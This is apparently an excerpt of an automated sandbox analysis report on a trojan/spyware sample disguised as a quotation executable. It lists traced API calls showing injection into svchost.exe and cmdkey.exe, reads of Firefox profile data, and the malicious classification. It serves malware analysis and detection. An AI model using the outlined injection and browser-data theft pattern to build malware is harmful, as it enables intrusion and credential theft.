                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C30 NtMapViewOfSection,3_2_03872C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03872C50 NtUnmapViewOfSection,3_2_03872C50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038738D0 NtGetContextThread,3_2_038738D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873C90 NtOpenThread,3_2_03873C90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03873C30 NtOpenProcessToken,3_2_03873C30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B4260 NtSetContextThread,LdrInitializeThunk,6_2_031B4260
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B4570 NtSuspendThread,LdrInitializeThunk,6_2_031B4570
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B10 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_031B2B10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B00 NtQueryValueKey,LdrInitializeThunk,6_2_031B2B00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B90 NtFreeVirtualMemory,LdrInitializeThunk,6_2_031B2B90
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B80 NtCreateKey,LdrInitializeThunk,6_2_031B2B80
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2BC0 NtQueryInformationToken,LdrInitializeThunk,6_2_031B2BC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2A10 NtWriteFile,LdrInitializeThunk,6_2_031B2A10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2A80 NtClose,LdrInitializeThunk,6_2_031B2A80
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2AC0 NtEnumerateValueKey,LdrInitializeThunk,6_2_031B2AC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B29F0 NtReadFile,LdrInitializeThunk,6_2_031B29F0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2F00 NtCreateFile,LdrInitializeThunk,6_2_031B2F00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2E00 NtQueueApcThread,LdrInitializeThunk,6_2_031B2E00
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2E50 NtCreateSection,LdrInitializeThunk,6_2_031B2E50
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2ED0 NtResumeThread,LdrInitializeThunk,6_2_031B2ED0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2D10 NtQuerySystemInformation,LdrInitializeThunk,6_2_031B2D10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2DA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_031B2DA0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C30 NtMapViewOfSection,LdrInitializeThunk,6_2_031B2C30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C50 NtUnmapViewOfSection,LdrInitializeThunk,6_2_031B2C50
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2CF0 NtDelayExecution,LdrInitializeThunk,6_2_031B2CF0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B34E0 NtCreateMutant,LdrInitializeThunk,6_2_031B34E0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B38D0 NtGetContextThread,LdrInitializeThunk,6_2_031B38D0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2B20 NtQueryInformationProcess,6_2_031B2B20
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2BE0 NtQueryVirtualMemory,6_2_031B2BE0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2AA0 NtQueryInformationFile,6_2_031B2AA0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B29D0 NtWaitForSingleObject,6_2_031B29D0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2F30 NtOpenDirectoryObject,6_2_031B2F30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2FB0 NtSetValueKey,6_2_031B2FB0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2E80 NtCreateProcessEx,6_2_031B2E80
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2EB0 NtProtectVirtualMemory,6_2_031B2EB0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2EC0 NtQuerySection,6_2_031B2EC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2D50 NtWriteVirtualMemory,6_2_031B2D50
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2DC0 NtAdjustPrivilegesToken,6_2_031B2DC0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C10 NtOpenProcess,6_2_031B2C10
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2C20 NtSetInformationFile,6_2_031B2C20
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B2CD0 NtEnumerateKey,6_2_031B2CD0
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B3C30 NtOpenProcessToken,6_2_031B3C30
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_031B3C90 NtOpenThread,6_2_031B3C90
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303EF38 NtQueryInformationProcess,NtReadVirtualMemory,6_2_0303EF38
                Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 6_2_0303F800 NtMapViewOfSection,6_2_0303F800
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012D5EB: CreateFileW,DeviceIoControl,CloseHandle,2_2_0012D5EB
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_00121201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,2_2_00121201
                Source: C:\Users\user\Desktop\QUOTATION#050125.exeCode function: 2_2_0012E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_0012E8F6
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00132046
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000C8060
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00128298
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000FE4FF
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000F676B
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00154873
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000ECAA0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000CCAF0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000DCC39
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000F6DD9
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000DB119
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000C91C0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E1394
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E1706
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E781B
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000C7920
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000D997D
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E19B0
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E7A4A
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E1C77
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E7CA7
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0014BE44
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000F9EEE
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E1F32
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00E1B6F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00418943
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0041478E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0042F053
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00401000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004030D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004100FA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00410103
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_004012C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00416B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00416B43
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00410323
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040E323
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040E467
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_00402780
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384E310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0390010E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038300A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038EE076
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F6757
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384A760
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03842760
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FA6C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385C600
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03864670
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0390A526
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840445
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B4BC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840B10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E2AC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FCA13
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FEA5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383E9A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FE9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03856882
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038DC89F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038428C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E810
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E0835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03826868
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FEFBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03846FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384CF00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F0EAD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03832EE8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03882E48
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03860E50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E0E6D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03852DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840D69
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03858CDF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0390ACEB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830C12
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384AC20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BEC20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038EEC4C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F6C69
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FEC60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03831380
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FF330
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382D2EC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F124C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038451C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385B1E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382F113
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038DD130
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0388717A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387508C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384B0D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F70F1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B36EC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FF6F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038DD62C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E1623
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038ED646
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FF5C9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F75C6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AD480
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D5490
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D1B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0387DB19
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FFB2E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FFA89
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385FAA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038859C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B98B2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F18DA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F78F3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03843800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03849870
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385B870
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B5870
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FF872
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E3FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F1FC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BFF40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FFF63
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03841EB2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F9ED2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03849DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038DFDF4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038FFD27
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F7D4C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D9C98
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038C7CE8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385FCE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03843C60
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0318E310
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03142245
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0324010E
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0322E076
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031700A0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03236757
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0318A760
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03182760
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0319C600
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031A4670
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03180680
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323A6C0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0317C6E0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0324A526
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03180445
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03180B10
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031F4BC0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323CA13
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323EA5B
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323E9A6
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0317E9A0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031AE810
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03220835
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03166868
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03196882
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0321C89F
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031828C0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0318CF00
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323EFBF
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03186FE0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031A0E50
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03220E6D
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031C2E48
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03230EAD
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03172EE8
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0317AD00
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03180D69
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03192DB0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03170C12
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0318AC20
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031FEC20
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323EC60
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03236C69
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0322EC4C
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03198CDF
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0324ACEB
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03188CE0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323F330
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03171380
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323124C
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0316D2EC
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0316F113
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0321D130
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031C717A
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031851C0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0319B1E0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031B508C
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0318B0D0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_032370F1
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0321D62C
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0322D646
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323F6F6
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031F36EC
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_032375C6
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323F5C9
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031ED480
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03215490
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031BDB19
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323FB2E
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03211B80
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323FA89
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0319FAA0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031C59C0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031499E8
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03183800
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323F872
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03189870
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0319B870
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031F5870
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031858B0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031F98B2
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_032378F3
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_032318DA
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323FF63
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_031FFF40
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03231FC6
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03181EB2
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03239ED2
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0323FD27
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03237D4C
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03189DD0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0321FDF4
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03183C60
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03219C98
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_03207CE8
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0319FCE0
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303EF38
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303E373
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303E255
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303E714
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303D7D8
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: 6_2_0303CA88
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038BEF10 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03887BE4 appears 102 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0382B910 appears 278 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038AE692 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03875050 appears 58 times
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: String function: 000C9CB3 appears 31 times
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: String function: 000E0A30 appears 46 times
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: String function: 000DF9F2 appears 40 times
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 031B5050 appears 58 times
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 0316B910 appears 275 times
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 031EE692 appears 86 times
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 031C7BE4 appears 101 times
                Source: C:\Windows\SysWOW64\cmdkey.exe | Code function: String function: 031FEF10 appears 105 times
                Source: QUOTATION#050125.exe, 00000002.00000003.288634641779.0000000003AB3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#050125.exe
                Source: QUOTATION#050125.exe, 00000002.00000003.288635000975.0000000003E1D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION#050125.exe
                Source: QUOTATION#050125.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_001337B5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_001210BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_001216C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_001351CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0014A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_0013648E CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000C42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | File created: C:\Users\user\AppData\Local\Temp\supergroups
                Source: QUOTATION#050125.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: QUOTATION#050125.exe | ReversingLabs: Detection: 63%
                Source: unknown | Process created: C:\Users\user\Desktop\QUOTATION#050125.exe "C:\Users\user\Desktop\QUOTATION#050125.exe"
